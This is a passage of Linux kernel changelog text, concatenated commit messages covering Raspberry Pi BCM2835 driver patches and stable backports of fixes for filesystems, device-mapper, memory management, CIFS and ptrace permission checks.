PHYs source PLLs. Neither of them is currently represented by a phy
device that would grab the clock for us.
This keeps other drivers from killing the networking PHYs when they
disable their own clocks and trigger PLLD_PER's refcount going to 0.
v2: Skip marking as critical if they aren't on at boot.
Signed-off-by: Eric Anholt <eric@anholt.net>
The VPU clock is also the clock for our AXI bus, so we really can't
disable it. This might have happened during boot if, for example,
uart1 (aux_uart clock) probed and was then disabled before the other
consumers of the VPU clock had probed.
v2: Rewrite to use a .flags in bcm2835_clock_data, since other clocks
will need this too.
Signed-off-by: Eric Anholt <eric@anholt.net>
Load driver early since at least bcm2708_fb doesn't support deferred
probing and even if it did, we don't want the video driver deferred.
Support the legacy DMA API which is needed by bcm2708_fb.
Don't mask out channel 2.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
The VideoCore bootloader passes in Serial number and
Revision number through Device Tree. Make these available to
userspace through /proc/cpuinfo.
Mainline status:
There is a commit in linux-next that standardize passing the serial
number through Device Tree (string: /serial-number):
ARM: 8355/1: arch: Show the serial number from devicetree in cpuinfo
There was an attempt to do the same with the revision number, but it
didn't get in:
[PATCH v2 1/2] arm: devtree: Set system_rev from DT revision
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
The spi-bcm2835 driver automatically uses GPIO chip-selects due to
some unreliability of the native ones. In doing so it chooses the
same pins as the native chip-selects would use, but the existing
code always uses pins 7 and 8, wherever the SPI function is mapped.
Search the pinctrl group assigned to the driver for pins that
correspond to native chip-selects, and use those for GPIO chip-
selects.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
When dynamically unloading overlays, it is important that freed pins are
restored to being inputs to prevent functions from being enabled in
multiple places at once.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Although the GPIO controller can generate three interrupts (four counting
the common one), the device tree files currently only specify two. In the
absence of the third, simply don't register that interrupt (as opposed to
registering 0), which has the effect of making it impossible to generate
interrupts for GPIOs 46-53 which, since they share pins with the SD card
interface, is unlikely to be a problem.
Contrary to the documentation, the BCM2835 GPIO controller actually has
four interrupt lines - one each for the three IRQ groups and one common. Rather
confusingly, the GPIO interrupt groups don't correspond directly with the GPIO
control banks. Instead, GPIOs 0-27 generate IRQ GPIO0, 28-45 GPIO1 and
46-53 GPIO2.
Awkwardly, the GPIOS for IRQ GPIO1 straddle two 32-entry GPIO banks, so it is
cleaner to split out a function to process the interrupts for a single GPIO
bank.
This bug has only just been observed because GPIOs above 27 can only be
accessed on an old Raspberry Pi with the optional P5 header fitted, where
the pins are often used for I2S instead.
Add a duplicate irq range with an offset on the hwirq's so the
driver can detect that enable_fiq() is used.
Tested with downstream dwc_otg USB controller driver.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Reviewed-by: Eric Anholt <eric@anholt.net>
Acked-by: Stephen Warren <swarren@wwwdotorg.org>
The old arch-specific IRQ macros included a dsb to ensure the
write to clear the mailbox interrupt completed before returning
from the interrupt. The BCM2836 irqchip driver needs the same
precaution to avoid spurious interrupts.
Spurious interrupts are still possible for other reasons,
though, so trap them early.
See commit dae803e165 -- the warning is
expected sometimes when using CMA. However, that commit still spams
my kernel log with these warnings.
Signed-off-by: Eric Anholt <eric@anholt.net>
tty_port_hangup sets a port's tty field to NULL (holding the port lock),
but uart_tx_stopped, called from __uart_start (with the port lock),
uses the tty field without checking for NULL.
Change uart_tx_stopped to treat a NULL tty field as another stopped
indication.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
smsc95xx is adjusting truesize when it shouldn't, and following a recent patch from Eric this is now triggering warnings.
This patch stops smsc95xx from changing truesize.
Signed-off-by: Steve Glendinning <steve.glendinning@smsc.com>
commit cebf8fd169 upstream.
The global mutex of 'gdp_mutex' is used to serialize creating/querying
glue dir and its cleanup. Turns out it isn't a perfect way because
part(kobj_kset_leave()) of the actual cleanup action() is done inside
the release handler of the glue dir kobject. That means gdp_mutex has
to be held before releasing the last reference count of the glue dir
kobject.
This patch moves glue dir's cleanup after kobject_del() in device_del()
for avoiding the race.
Cc: Yijing Wang <wangyijing@huawei.com>
Reported-by: Chandra Sekhar Lingutla <clingutla@codeaurora.org>
Signed-off-by: Ming Lei <ming.lei@canonical.com>
Cc: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e7cd190385 upstream.
Kdump(kexec-tools) parses /proc/iomem to identify all the memory regions
on the system. Since the current kernel names "nomap" regions, like UEFI
runtime services code/data, as "System RAM," kexec-tools sets up elf core
header to include them in a crash dump file (/proc/vmcore).
Then crash dump kernel parses UEFI memory map again, re-marks those regions
as "nomap" and does not create a memory mapping for them unlike the other
areas of System RAM. In this case, copying /proc/vmcore through
copy_oldmem_page() on crash dump kernel will end up with a kernel abort,
as reported in [1].
This patch names all the "nomap" regions explicitly as "reserved" so that
we can exclude them from a crash dump file. acpi_os_ioremap() must also
be modified because those regions have WB attributes [2].
Apart from kdump, this change also matches x86's use of acpi (and
/proc/iomem).
[1] http://lists.infradead.org/pipermail/linux-arm-kernel/2016-August/448186.html
[2] http://lists.infradead.org/pipermail/linux-arm-kernel/2016-August/450089.html
Reviewed-by: Catalin Marinas <catalin.marinas@arm.com>
Tested-by: James Morse <james.morse@arm.com>
Reviewed-by: James Morse <james.morse@arm.com>
Signed-off-by: AKASHI Takahiro <takahiro.akashi@linaro.org>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Cc: Matthias Brugger <mbrugger@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6b10b23ca9 upstream.
xlog_recover_clear_agi_bucket didn't set the
type to XFS_BLFT_AGI_BUF, so we got a warning during log
replay (or an ASSERT on a debug build).
XFS (md0): Unknown buffer type 0!
XFS (md0): _xfs_buf_ioapply: no ops on block 0xaea8802/0x1
Fix this, as was done in f19b872b for 2 other locations
with the same problem.
Signed-off-by: Eric Sandeen <sandeen@redhat.com>
Reviewed-by: Brian Foster <bfoster@redhat.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Dave Chinner <david@fromorbit.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 30faaafdfa upstream.
Commit 9c17d96500 ("xen/gntdev: Grant maps should not be subject to
NUMA balancing") set VM_IO flag to prevent grant maps from being
subjected to NUMA balancing.
It was discovered recently that this flag causes get_user_pages() to
always fail with -EFAULT.
check_vma_flags
__get_user_pages
__get_user_pages_locked
__get_user_pages_unlocked
get_user_pages_fast
iov_iter_get_pages
dio_refill_pages
do_direct_IO
do_blockdev_direct_IO
do_blockdev_direct_IO
ext4_direct_IO_read
generic_file_read_iter
aio_run_iocb
(which can happen if guest's vdisk has direct-io-safe option).
To avoid this let's use VM_MIXEDMAP flag instead --- it prevents
NUMA balancing just as VM_IO does and has no effect on
check_vma_flags().
Reported-by: Olaf Hering <olaf@aepfle.de>
Suggested-by: Hugh Dickins <hughd@google.com>
Signed-off-by: Boris Ostrovsky <boris.ostrovsky@oracle.com>
Acked-by: Hugh Dickins <hughd@google.com>
Tested-by: Olaf Hering <olaf@aepfle.de>
Signed-off-by: Juergen Gross <jgross@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2d13bb6494 upstream.
We've got a delay loop waiting for secondary CPUs. That loop uses
loops_per_jiffy. However, loops_per_jiffy doesn't actually mean how
many tight loops make up a jiffy on all architectures. It is quite
common to see things like this in the boot log:
Calibrating delay loop (skipped), value calculated using timer
frequency.. 48.00 BogoMIPS (lpj=24000)
In my case I was seeing lots of cases where other CPUs timed out
entering the debugger only to print their stack crawls shortly after the
kdb> prompt was written.
Elsewhere in kgdb we already use udelay(), so that should be safe enough
to use to implement our timeout. We'll delay 1 ms for 1000 times, which
should give us a full second of delay (just like the old code wanted)
but allow us to notice that we're done every 1 ms.
[akpm@linux-foundation.org: simplifications, per Daniel]
Link: http://lkml.kernel.org/r/1477091361-2039-1-git-send-email-dianders@chromium.org
Signed-off-by: Douglas Anderson <dianders@chromium.org>
Reviewed-by: Daniel Thompson <daniel.thompson@linaro.org>
Cc: Jason Wessel <jason.wessel@windriver.com>
Cc: Brian Norris <briannorris@chromium.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9eff1140a8 upstream.
Systemd on reboot enables shutdown watchdog that leaves the watchdog
device open to ensure that even if power down process get stuck the
platform reboots nonetheless.
The iamt_wdt is an alarm-only watchdog and can't reboot system, but the
FW will generate an alarm event reboot was completed in time, as the
watchdog is not automatically disabled during power cycle.
So we should request stop watchdog on reboot to eliminate wrong alarm
from the FW.
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Reviewed-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4d1f0fb096 upstream.
NMI handler doesn't call set_irq_regs(), it's set only by normal IRQ.
Thus get_irq_regs() returns NULL or stale registers snapshot with IP/SP
pointing to the code interrupted by IRQ which was interrupted by NMI.
NULL isn't a problem: in this case watchdog calls dump_stack() and
prints full stack trace including NMI. But if we're stuck in IRQ
handler then NMI watchlog will print stack trace without IRQ part at
all.
This patch uses registers snapshot passed into NMI handler as arguments:
these registers point exactly to the instruction interrupted by NMI.
Fixes: 55537871ef ("kernel/watchdog.c: perform all-CPU backtrace in case of hard lockup")
Link: http://lkml.kernel.org/r/146771764784.86724.6006627197118544150.stgit@buzz
Signed-off-by: Konstantin Khlebnikov <khlebnikov@yandex-team.ru>
Cc: Jiri Kosina <jkosina@suse.cz>
Cc: Ulrich Obergfell <uobergfe@redhat.com>
Cc: Aaron Tomlin <atomlin@redhat.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e3d240e9d5 upstream.
If maxBuf is not 0 but less than a size of SMB2 lock structure
we can end up with a memory corruption.
Signed-off-by: Pavel Shilovsky <pshilov@microsoft.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 53e0e11efe upstream.
We can not unlock/lock cifs_tcp_ses_lock while walking through ses
and tcon lists because it can corrupt list iterator pointers and
a tcon structure can be released if we don't hold an extra reference.
Fix it by moving a reconnect process to a separate delayed work
and acquiring a reference to every tcon that needs to be reconnected.
Also do not send an echo request on newly established connections.
Signed-off-by: Pavel Shilovsky <pshilov@microsoft.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 314c25c56c upstream.
In dm_sm_metadata_create() we temporarily change the dm_space_map
operations from 'ops' (whose .destroy function deallocates the
sm_metadata) to 'bootstrap_ops' (whose .destroy function doesn't).
If dm_sm_metadata_create() fails in sm_ll_new_metadata() or
sm_ll_extend(), it exits back to dm_tm_create_internal(), which calls
dm_sm_destroy() with the intention of freeing the sm_metadata, but it
doesn't (because the dm_space_map operations is still set to
'bootstrap_ops').
Fix this by setting the dm_space_map operations back to 'ops' if
dm_sm_metadata_create() fails when it is set to 'bootstrap_ops'.
Signed-off-by: Benjamin Marzinski <bmarzins@redhat.com>
Acked-by: Joe Thornber <ejt@redhat.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d15bb3a646 upstream.
It is required to hold the queue lock when calling blk_run_queue_async()
to avoid that a race between blk_run_queue_async() and
blk_cleanup_queue() is triggered.
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 265e9098ba upstream.
In crypt_set_key(), if a failure occurs while replacing the old key
(e.g. tfm->setkey() fails) the key must not have DM_CRYPT_KEY_VALID flag
set. Otherwise, the crypto layer would have an invalid key that still
has DM_CRYPT_KEY_VALID flag set.
Signed-off-by: Ondrej Kozina <okozina@redhat.com>
Reviewed-by: Mikulas Patocka <mpatocka@redhat.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bff7e067ee upstream.
Fix to return error code -EINVAL instead of 0, as is done elsewhere in
this function.
Fixes: e80d1c805a ("dm: do not override error code returned from dm_get_device()")
Signed-off-by: Wei Yongjun <weiyj.lk@gmail.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 301fc3f5ef upstream.
When dm_table_set_type() is used by a target to establish a DM table's
type (e.g. DM_TYPE_MQ_REQUEST_BASED in the case of DM multipath) the
DM core must go on to verify that the devices in the table are
compatible with the established type.
Fixes: e83068a5 ("dm mpath: add optional "queue_mode" feature")
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6936c12cf8 upstream.
An earlier DM multipath table could have been build ontop of underlying
devices that were all using blk-mq. In that case, if that active
multipath table is replaced with an empty DM multipath table (that
reflects all paths have failed) then it is important that the
'all_blk_mq' state of the active table is transfered to the new empty DM
table. Otherwise dm-rq.c:dm_old_prep_tio() will incorrectly clone a
request that isn't needed by the DM multipath target when it is to issue
IO to an underlying blk-mq device.
Fixes: e83068a5 ("dm mpath: add optional "queue_mode" feature")
Reported-by: Bart Van Assche <bart.vanassche@sandisk.com>
Tested-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 91291d9ad9 upstream.
Joonyoung Shim reported an interesting problem on his ARM octa-core
Odoroid-XU3 platform. During system suspend, dev_pm_opp_put_regulator()
was failing for a struct device for which dev_pm_opp_set_regulator() is
called earlier.
This happened because an earlier call to
dev_pm_opp_of_cpumask_remove_table() function (from cpufreq-dt.c file)
removed all the entries from opp_table->dev_list apart from the last CPU
device in the cpumask of CPUs sharing the OPP.
But both dev_pm_opp_set_regulator() and dev_pm_opp_put_regulator()
routines get CPU device for the first CPU in the cpumask. And so the OPP
core failed to find the OPP table for the struct device.
This patch attempts to fix this problem by returning a pointer to the
opp_table from dev_pm_opp_set_regulator() and using that as the
parameter to dev_pm_opp_put_regulator(). This ensures that the
dev_pm_opp_put_regulator() doesn't fail to find the opp table.
Note that similar design problem also exists with other
dev_pm_opp_put_*() APIs, but those aren't used currently by anyone and
so we don't need to update them for now.
Reported-by: Joonyoung Shim <jy0922.shim@samsung.com>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Viresh Kumar <viresh.kumar@linaro.org>
[ Viresh: Wrote commit log and tested on exynos 5250 ]
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit eaa496ffaa upstream.
ep->mult is supposed to be set to Isochronous and
Interrupt Endapoint's multiplier value. This value
is computed from different places depending on the
link speed.
If we're dealing with HighSpeed, then it's part of
bits [12:11] of wMaxPacketSize. This case wasn't
taken into consideration before.
While at that, also make sure the ep->mult defaults
to one so drivers can use it unconditionally and
assume they'll never multiply ep->maxpacket to zero.
Cc: <stable@vger.kernel.org>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a6de734bc0 upstream.
Vlastimil Babka pointed out that commit 479f854a20 ("mm, page_alloc:
defer debugging checks of pages allocated from the PCP") will allow the
per-cpu list counter to be out of sync with the per-cpu list contents if
a struct page is corrupted.
The consequence is an infinite loop if the per-cpu lists get fully
drained by free_pcppages_bulk because all the lists are empty but the
count is positive. The infinite loop occurs here
do {
batch_free++;
if (++migratetype == MIGRATE_PCPTYPES)
migratetype = 0;
list = &pcp->lists[migratetype];
} while (list_empty(list));
What the user sees is a bad page warning followed by a soft lockup with
interrupts disabled in free_pcppages_bulk().
This patch keeps the accounting in sync.
Fixes: 479f854a20 ("mm, page_alloc: defer debugging checks of pages allocated from the PCP")
Link: http://lkml.kernel.org/r/20161202112951.23346-2-mgorman@techsingularity.net
Signed-off-by: Mel Gorman <mgorman@suse.de>
Acked-by: Vlastimil Babka <vbabka@suse.cz>
Acked-by: Michal Hocko <mhocko@suse.com>
Acked-by: Hillf Danton <hillf.zj@alibaba-inc.com>
Cc: Christoph Lameter <cl@linux.com>
Cc: Johannes Weiner <hannes@cmpxchg.org>
Cc: Jesper Dangaard Brouer <brouer@redhat.com>
Cc: Joonsoo Kim <iamjoonsoo.kim@lge.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5f33a0803b upstream.
Our system uses significantly more slab memory with memcg enabled with
the latest kernel. With 3.10 kernel, slab uses 2G memory, while with
4.6 kernel, 6G memory is used. The shrinker has problem. Let's see we
have two memcg for one shrinker. In do_shrink_slab:
1. Check cg1. nr_deferred = 0, assume total_scan = 700. batch size
is 1024, then no memory is freed. nr_deferred = 700
2. Check cg2. nr_deferred = 700. Assume freeable = 20, then
total_scan = 10 or 40. Let's assume it's 10. No memory is freed.
nr_deferred = 10.
The deferred share of cg1 is lost in this case. kswapd will free no
memory even run above steps again and again.
The fix makes sure one memcg's deferred share isn't lost.
Link: http://lkml.kernel.org/r/2414be961b5d25892060315fbb56bb19d81d0c07.1476227351.git.shli@fb.com
Signed-off-by: Shaohua Li <shli@fb.com>
Cc: Johannes Weiner <hannes@cmpxchg.org>
Cc: Michal Hocko <mhocko@kernel.org>
Cc: Vladimir Davydov <vdavydov@parallels.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e4fcf07cca upstream.
When removing a namespace we delete it from the subsystem namespaces
list with list_del_init which allows us to know if it is enabled or
not.
The problem is that list_del_init initialize the list next and does
not respect the RCU list-traversal we do on the IO path for locating
a namespace. Instead we need to use list_del_rcu which is allowed to
run concurrently with the _rcu list-traversal primitives (keeps list
next intact) and guarantees concurrent nvmet_find_naespace forward
progress.
By changing that, we cannot rely on ns->dev_link for knowing if the
namspace is enabled, so add enabled indicator entry to nvmet_ns for
that.
Signed-off-by: Sagi Grimberg <sagi@grimberg.me>
Signed-off-by: Solganik Alexander <sashas@lightbitslabs.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b4a567e811 upstream.
->queue_rq() should return one of the BLK_MQ_RQ_QUEUE_* constants, not
an errno.
Fixes: f4aa4c7bba ("block: loop: convert to per-device workqueue")
Signed-off-by: Omar Sandoval <osandov@fb.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e87f7329bb upstream.
In the last ilen case, i was already increased, resulting in accessing out-
of-boundary entry of do_replace and blkaddr.
Fix to check ilen first to exit the loop.
Fixes: 2aa8fbb9693020 ("f2fs: refactor __exchange_data_block for speed up")
Signed-off-by: Jaegeuk Kim <jaegeuk@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 05e6ea2685 upstream.
The struct file_operations instance serving the f2fs/status debugfs file
lacks an initialization of its ->owner.
This means that although that file might have been opened, the f2fs module
can still get removed. Any further operation on that opened file, releasing
included, will cause accesses to unmapped memory.
Indeed, Mike Marshall reported the following:
BUG: unable to handle kernel paging request at ffffffffa0307430
IP: [<ffffffff8132a224>] full_proxy_release+0x24/0x90
<...>
Call Trace:
[] __fput+0xdf/0x1d0
[] ____fput+0xe/0x10
[] task_work_run+0x8e/0xc0
[] do_exit+0x2ae/0xae0
[] ? __audit_syscall_entry+0xae/0x100
[] ? syscall_trace_enter+0x1ca/0x310
[] do_group_exit+0x44/0xc0
[] SyS_exit_group+0x14/0x20
[] do_syscall_64+0x61/0x150
[] entry_SYSCALL64_slow_path+0x25/0x25
<...>
---[ end trace f22ae883fa3ea6b8 ]---
Fixing recursive fault but reboot is needed!
Fix this by initializing the f2fs/status file_operations' ->owner with
THIS_MODULE.
This will allow debugfs to grab a reference to the f2fs module upon any
open on that file, thus preventing it from getting removed.
Fixes: 902829aa0b ("f2fs: move proc files to debugfs")
Reported-by: Mike Marshall <hubcap@omnibond.com>
Reported-by: Martin Brandenburg <martin@omnibond.com>
Signed-off-by: Nicolai Stange <nicstange@gmail.com>
Signed-off-by: Jaegeuk Kim <jaegeuk@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 204706c7ac upstream.
This reverts commit 1beba1b3a9.
The perpcu_counter doesn't provide atomicity in single core and consume more
DRAM. That incurs fs_mark test failure due to ENOMEM.
Signed-off-by: Jaegeuk Kim <jaegeuk@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 73b92a2a5e upstream.
Currently data journalling is incompatible with encryption: enabling both
at the same time has never been supported by design, and would result in
unpredictable behavior. However, users are not precluded from turning on
both features simultaneously. This change programmatically replaces data
journaling for encrypted regular files with ordered data journaling mode.
Background:
Journaling encrypted data has not been supported because it operates on
buffer heads of the page in the page cache. Namely, when the commit
happens, which could be up to five seconds after caching, the commit
thread uses the buffer heads attached to the page to copy the contents of
the page to the journal. With encryption, it would have been required to
keep the bounce buffer with ciphertext for up to the aforementioned five
seconds, since the page cache can only hold plaintext and could not be
used for journaling. Alternatively, it would be required to setup the
journal to initiate a callback at the commit time to perform deferred
encryption - in this case, not only would the data have to be written
twice, but it would also have to be encrypted twice. This level of
complexity was not justified for a mode that in practice is very rarely
used because of the overhead from the data journalling.
Solution:
If data=journaled has been set as a mount option for a filesystem, or if
journaling is enabled on a regular file, do not perform journaling if the
file is also encrypted, instead fall back to the data=ordered mode for the
file.
Rationale:
The intent is to allow seamless and proper filesystem operation when
journaling and encryption have both been enabled, and have these two
conflicting features gracefully resolved by the filesystem.
Fixes: 4461471107
Signed-off-by: Sergey Karamov <skaramov@google.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7e6e1ef48f upstream.
Don't load an inode with a negative size; this causes integer overflow
problems in the VFS.
[ Added EXT4_ERROR_INODE() to mark file system as corrupted. -TYT]
Fixes: a48380f769 (ext4: rename i_dir_acl to i_size_high)
Signed-off-by: Darrick J. Wong <darrick.wong@oracle.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c48ae41baf upstream.
The commit "ext4: sanity check the block and cluster size at mount
time" should prevent any problems, but in case the superblock is
modified while the file system is mounted, add an extra safety check
to make sure we won't overrun the allocated buffer.
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5aee0f8a3f upstream.
Fix a large number of problems with how we handle mount options in the
superblock. For one, if the string in the superblock is long enough
that it is not null terminated, we could run off the end of the string
and try to interpret superblocks fields as characters. It's unlikely
this will cause a security problem, but it could result in an invalid
parse. Also, parse_options is destructive to the string, so in some
cases if there is a comma-separated string, it would be modified in
the superblock. (Fortunately it only happens on file systems with a
1k block size.)
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cd6bb35bf7 upstream.
Centralize the checks for inodes_per_block and be more strict to make
sure the inodes_per_block_group can't end up being zero.
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 30a9d7afe7 upstream.
The number of 'counters' elements needed in 'struct sg' is
super_block->s_blocksize_bits + 2. Presently we have 16 'counters'
elements in the array. This is insufficient for block sizes >= 32k. In
such cases the memcpy operation performed in ext4_mb_seq_groups_show()
would cause stack memory corruption.
Fixes: c9de560ded
Signed-off-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Jan Kara <jack@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 69e43e8cc9 upstream.
'border' variable is set to a value of 2 times the block size of the
underlying filesystem. With 64k block size, the resulting value won't
fit into a 16-bit variable. Hence this commit changes the data type of
'border' to 'unsigned int'.
Fixes: c9de560ded
Signed-off-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d128af1787 upstream.
The AEAD givenc descriptor relies on moving the IV through the
output FIFO and then back to the CTX2 for authentication. The
SEQ FIFO STORE could be scheduled before the data can be
read from OFIFO, especially since the SEQ FIFO LOAD needs
to wait for the SEQ FIFO LOAD SKIP to finish first. The
SKIP takes more time when the input is SG than when it's
a contiguous buffer. If the SEQ FIFO LOAD is not scheduled
before the STORE, the DECO will hang waiting for data
to be available in the OFIFO so it can be transferred to C2.
In order to overcome this, first force transfer of IV to C2
by starting the "cryptlen" transfer first and then starting to
store data from OFIFO to the output buffer.
Fixes: 1acebad3d8 ("crypto: caam - faster aead implementation")
Signed-off-by: Alex Porosanu <alexandru.porosanu@nxp.com>
Signed-off-by: Horia Geantă <horia.geanta@nxp.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 64b875f7ac upstream.
When the flag PT_PTRACE_CAP was added the PTRACE_TRACEME path was
overlooked. This can result in incorrect behavior when an application
like strace traces an exec of a setuid executable.
Further PT_PTRACE_CAP does not have enough information for making good
security decisions as it does not report which user namespace the
capability is in. This has already allowed one mistake through
insufficient granulariy.
I found this issue when I was testing another corner case of exec and
discovered that I could not get strace to set PT_PTRACE_CAP even when
running strace as root with a full set of caps.
This change fixes the above issue with strace allowing stracing as
root a setuid executable without disabling setuid. More fundamentaly
this change allows what is allowable at all times, by using the correct
information in it's decision.
Fixes: 4214e42f96d4 ("v2.4.9.11 -> v2.4.9.12")
Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bfedb58925 upstream.
During exec dumpable is cleared if the file that is being executed is
not readable by the user executing the file. A bug in
ptrace_may_access allows reading the file if the executable happens to
enter into a subordinate user namespace (aka clone(CLONE_NEWUSER),
unshare(CLONE_NEWUSER), or setns(fd, CLONE_NEWUSER).
This problem is fixed with only necessary userspace breakage by adding
a user namespace owner to mm_struct, captured at the time of exec, so
it is clear in which user namespace CAP_SYS_PTRACE must be present in
to be able to safely give read permission to the executable.
The function ptrace_may_access is modified to verify that the ptracer
has CAP_SYS_ADMIN in task->mm->user_ns instead of task->cred->user_ns.
This ensures that if the task changes it's cred into a subordinate
user namespace it does not become ptraceable.
The function ptrace_attach is modified to only set PT_PTRACE_CAP when
CAP_SYS_PTRACE is held over task->mm->user_ns. The intent of
PT_PTRACE_CAP is to be a flag to note that whatever permission changes
the task might go through the tracer has sufficient permissions for
it not to be an issue. task->cred->user_ns is always the same
as or descendent of mm->user_ns. Which guarantees that having
CAP_SYS_PTRACE over mm->user_ns is the worst case for the tasks
credentials.
To prevent regressions mm->dumpable and mm->user_ns are not considered
when a task has no mm. As simply failing ptrace_may_attach causes
regressions in privileged applications attempting to read things
such as /proc/<pid>/stat
Acked-by: Kees Cook <keescook@chromium.org>
Tested-by: Cyrill Gorcunov <gorcunov@openvz.org>
Fixes: 8409cca705 ("userns: allow ptrace from non-init user namespaces")
Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bcc7f5b4be upstream.
bdev->bd_contains is not stable before calling __blkdev_get().
When __blkdev_get() is called on a parition with ->bd_openers == 0
it sets
bdev->bd_contains = bdev;
which is not correct for a partition.
After a call to __blkdev_get() succeeds, ->bd_openers will be > 0
and then ->bd_contains is stable.
When FMODE_EXCL is used, blkdev_get() calls
bd_start_claiming() -> bd_prepare_to_claim() -> bd_may_claim()
This call happens before __blkdev_get() is called, so ->bd_contains
is not stable. So bd_may_claim() cannot safely use ->bd_contains.
It currently tries to use it, and this can lead to a BUG_ON().
This happens when a whole device is already open with a bd_holder (in
use by dm in my particular example) and two threads race to open a
partition of that device for the first time, one opening with O_EXCL and
one without.
The thread that doesn't use O_EXCL gets through blkdev_get() to
__blkdev_get(), gains the ->bd_mutex, and sets bdev->bd_contains = bdev;
Immediately thereafter the other thread, using FMODE_EXCL, calls
bd_start_claiming() from blkdev_get(). This should fail because the
whole device has a holder, but because bdev->bd_contains == bdev
bd_may_claim() incorrectly reports success.
This thread continues and blocks on bd_mutex.
The first thread then sets bdev->bd_contains correctly and drops the mutex.
The thread using FMODE_EXCL then continues and when it calls bd_may_claim()
again in:
BUG_ON(!bd_may_claim(bdev, whole, holder));
The BUG_ON fires.
Fix this by removing the dependency on ->bd_contains in
bd_may_claim(). As bd_may_claim() has direct access to the whole
